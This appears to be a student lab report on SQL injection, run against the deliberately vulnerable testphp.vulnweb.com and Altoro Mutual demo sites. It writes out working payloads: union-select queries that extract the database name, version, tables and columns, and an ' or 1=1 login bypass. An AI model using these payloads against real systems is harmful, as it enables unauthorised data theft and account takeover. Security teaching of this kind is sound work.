Exp1.4 WMS
Exp1.4 WMS
3. Tools Used:
4. Steps Involved:
1. First of all visit the page testphp.vulnweb.com.
2. Now use the following commands and see for the output:
• Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
• Put the random number, cheat code -
http://testphp.vulnweb.com/listproducts.php?cat=-1 order by clause to check the row
(tuple).
• Information gathering-
• To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,database()--
• To check the database version ,Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,version()—
• Information to be fetch-
• Table name- http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20i
nformation_schema.tables%20where%20table_schema=database()--
• Column name- http://testphp.vulnweb.com/listproducts.php?cat=-
1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name)%20from%
20information_schema.columns%20where%20table_name=0x7573657273
3. Now, for Direct access to a user’s account we implement Sql Direct Access Injection.
So, in order to perform that, visit the site of Altoro Mutual Bank Login.
4. Now, in place of user id put: “ ‘ or 1=1--+ ” and choose any password according to
your choice.
5. “Boom”, we get the direct entry into the user’s account verified by the side of server.
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
OUTPUT:
ACUNETIX ACUART:
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
ALTORO MUTUAL:
DEPARTMENT OF
COMPUTER SCIENCE & ENGINEERING
Learning Outcomes:
• We learnt about the vulnerabilities of any particular site on its server.
• Learnt how does a SQL Injection attack works.